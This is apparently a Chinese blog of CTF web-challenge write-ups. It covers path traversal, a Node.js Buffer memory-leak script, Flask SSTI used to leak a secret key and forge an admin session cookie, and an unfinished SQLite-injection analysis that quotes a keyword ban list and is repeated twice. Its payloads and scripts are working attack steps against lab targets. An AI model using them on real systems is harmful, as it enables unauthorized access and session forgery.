web 刷题(七)


阅读数: 次   

[网鼎杯 2020 半决赛]AliceWebsite

2021.2.25

考点

目录穿透

根据 url 类型猜测

做题步骤

/index.php?action=../../../../../flag

得到 flag

[HITCON 2016]Leaking

2021.2.25

考点

nodejs 8.0 之前可以利用 buffer 查看内存

做题步骤

打开网页给到代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
"use strict";

var randomstring = require("randomstring");
var express = require("express");
var {
    VM
} = require("vm2");
var fs = require("fs");

var app = express();
var flag = require("./config.js").flag

app.get("/", function(req, res) {
    res.header("Content-Type", "text/plain");

    /*    Orange is so kind so he put the flag here. But if you can guess correctly :P    */
    eval("var flag_" + randomstring.generate(64) + " = \"hitcon{" + flag + "}\";")
    if (req.query.data && req.query.data.length <= 12) {
        var vm = new VM({
            timeout: 1000
        });
        console.log(req.query.data);
        res.send("eval ->" + vm.run(req.query.data));
    } else {
        res.send(fs.readFileSync(__filename).toString());
    }
});

app.listen(3000, function() {
    console.log("listening on port 3000!");
});

引用了 vm2 应该是个 nodejs 的沙盒题目

https://xz.aliyun.com/t/7842

利用沙箱逃逸

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
# encoding=utf-8

import requests
import time
url = 'http://fe3dc8f6-f812-4306-8c7c-b8741ab167a6.node3.buuoj.cn/?data=Buffer(500)'
response = ''
while 'flag' not in response:
        req = requests.get(url)
        response = req.text
        print(req.status_code)
        time.sleep(0.1)
        print(response)
        if 'flag{' in response:
            print(response)
            break

[FBCTF2019]Event

2021.3.3

考点

Flask 伪造

SSTI

做题步骤

发现能注册 但是不能注册 admin 账号 可能和 cookie 有关

可能需要伪造

image-20210303110509972

进入后有个留言功能,首先想到的就是看看有没有SSTI

cookie 解密

image-20210303110720150

user cookie 有点奇怪

不知道怎么解密。

这里可能就是需要伪造

image-20210303112318578

这个应该是没我要 伪造的值。

测试我们的传入的参数的位置

存在 3个参数,event_address event_name even_important

image-20210303112735030

测试发现 event_important 存在 SSTI 漏洞

event_address=123&event_name=123&event_important=__class__

可以得到 __class__<class 'app.Event'>

这里我们要伪造 cookie, 那么我们就必须要知道 伪造需要的 秘钥是什么

一般 秘钥都存放在 config 里面的

event_important=__class__.__init__.__globals__[app].config

image-20210303113635373

fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y

看看能不能利用这个来解密 我们的user cookie

image-20210303114033049

解密是我们的注册账号名字

加密 admin 对应的 cookie

直接利用这个脚本 不能 进行 加密。

自己写脚本加密 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from flask import Flask
from flask.sessions import SecureCookieSessionInterface

app = Flask(__name__)
app.secret_key = b'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y'

session_serializer = SecureCookieSessionInterface().get_signing_serializer(app)

@app.route('/')
def index():
    print(session_serializer.dumps("admin"))

index()
# ImFkbWluIg.YD8HGw.oED3iskNGMX_EBat8Oxd6fk44II

替换 user cookie 得到flag

[极客大挑战 2020]Roamphp1-Welcome

2021.3.10

考点

做题步骤

打开网页提示 是 405 抓包看看是什么情况

image-20210310135607143

这样说的 这个方法不被允许我们换成 post 传参

image-20210310135743052

成功返回

image-20210310135908684

传入数组

roam1[]=1&roam2[]=2

返回 phpinfo

image-20210310140447220

然后看到一个重点

image-20210310140515272

访问得到flag

image-20210310140604466

[HarekazeCTF2019]Sqlite Voting

2021.3.3

考点

做题步骤

打开一个 选择网页

image-20210303135418242

然后我们可以查看 vote.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
<?php
error_reporting(0);

if (isset($_GET['source'])) {
  show_source(__FILE__);
  exit();
}

function is_valid($str) {
  $banword = [
    // dangerous chars
    // " % ' * + / < = > \ _ ` ~ -
    "[\"%'*+\\/<=>\\\\_`~-]",
    // whitespace chars
    '\s',
    // dangerous functions
    'blob', 'load_extension', 'char', 'unicode',
    '(in|sub)str', '[lr]trim', 'like', 'glob', 'match', 'regexp',
    'in', 'limit', 'order', 'union', 'join'
  ];
  $regexp = '/' . implode('|', $banword) . '/i';
  if (preg_match($regexp, $str)) {
    return false;
  }
  return true;
}

header("Content-Type: text/json; charset=utf-8");

// check user input
if (!isset($_POST['id']) || empty($_POST['id'])) {
  die(json_encode(['error' => 'You must specify vote id']));
}
$id = $_POST['id'];
if (!is_valid($id)) {
  die(json_encode(['error' => 'Vote id contains dangerous chars']));
}

// update database
$pdo = new PDO('sqlite:../db/vote.db');
$res = $pdo->query("UPDATE vote SET count = count + 1 WHERE id = ${id}");
if ($res === false) {
  die(json_encode(['error' => 'An error occurred while updating database']));
}

// succeeded!
echo json_encode([
  'message' => 'Thank you for your vote! The result will be published after the CTF finished.'
]);

里面有个 update 操作

1
$res = $pdo->query("UPDATE vote SET count = count + 1 WHERE id = ${id}");

还有个数据库

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
DROP TABLE IF EXISTS `vote`;
CREATE TABLE `vote` (
  `id` INTEGER PRIMARY KEY AUTOINCREMENT,
  `name` TEXT NOT NULL,
  `count` INTEGER
);
INSERT INTO `vote` (`name`, `count`) VALUES
  ('dog', 0),
  ('cat', 0),
  ('zebra', 0),
  ('koala', 0);

DROP TABLE IF EXISTS `flag`;
CREATE TABLE `flag` (
  `flag` TEXT NOT NULL
);
INSERT INTO `flag` VALUES ('HarekazeCTF{<redacted>}');

里面 存在一个 flag 表里面存在flags

我们要做的就是想办法得到 这个 flag

我们会发现,在程序中,没有可以回显的地方。

这里我们只能利用 报错注入,或者盲注。

根据这个题目,我们知道的是这个是一个 sqllite 的数据库。

因为 UPDATE 所以看看有没有办法

[HarekazeCTF2019]Sqlite Voting

2021.3.3

考点

做题步骤

打开一个 选择网页

image-20210303135418242

然后我们可以查看 vote.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
<?php
error_reporting(0);

if (isset($_GET['source'])) {
  show_source(__FILE__);
  exit();
}

function is_valid($str) {
  $banword = [
    // dangerous chars
    // " % ' * + / < = > \ _ ` ~ -
    "[\"%'*+\\/<=>\\\\_`~-]",
    // whitespace chars
    '\s',
    // dangerous functions
    'blob', 'load_extension', 'char', 'unicode',
    '(in|sub)str', '[lr]trim', 'like', 'glob', 'match', 'regexp',
    'in', 'limit', 'order', 'union', 'join'
  ];
  $regexp = '/' . implode('|', $banword) . '/i';
  if (preg_match($regexp, $str)) {
    return false;
  }
  return true;
}

header("Content-Type: text/json; charset=utf-8");

// check user input
if (!isset($_POST['id']) || empty($_POST['id'])) {
  die(json_encode(['error' => 'You must specify vote id']));
}
$id = $_POST['id'];
if (!is_valid($id)) {
  die(json_encode(['error' => 'Vote id contains dangerous chars']));
}

// update database
$pdo = new PDO('sqlite:../db/vote.db');
$res = $pdo->query("UPDATE vote SET count = count + 1 WHERE id = ${id}");
if ($res === false) {
  die(json_encode(['error' => 'An error occurred while updating database']));
}

// succeeded!
echo json_encode([
  'message' => 'Thank you for your vote! The result will be published after the CTF finished.'
]);

里面有个 update 操作

1
$res = $pdo->query("UPDATE vote SET count = count + 1 WHERE id = ${id}");

还有个数据库

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
DROP TABLE IF EXISTS `vote`;
CREATE TABLE `vote` (
  `id` INTEGER PRIMARY KEY AUTOINCREMENT,
  `name` TEXT NOT NULL,
  `count` INTEGER
);
INSERT INTO `vote` (`name`, `count`) VALUES
  ('dog', 0),
  ('cat', 0),
  ('zebra', 0),
  ('koala', 0);

DROP TABLE IF EXISTS `flag`;
CREATE TABLE `flag` (
  `flag` TEXT NOT NULL
);
INSERT INTO `flag` VALUES ('HarekazeCTF{<redacted>}');

里面 存在一个 flag 表里面存在flags

我们要做的就是想办法得到 这个 flag

我们会发现,在程序中,没有可以回显的地方。

这里我们只能利用 报错注入,或者盲注。

根据这个题目,我们知道的是这个是一个 sqllite 的数据库。

因为 UPDATE 所以看看有没有办法

谢谢你请我吃糖果

扫一扫,分享到微信

微信分享二维码

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

很惭愧<br><br>只做了一点微小的工作<br>谢谢大家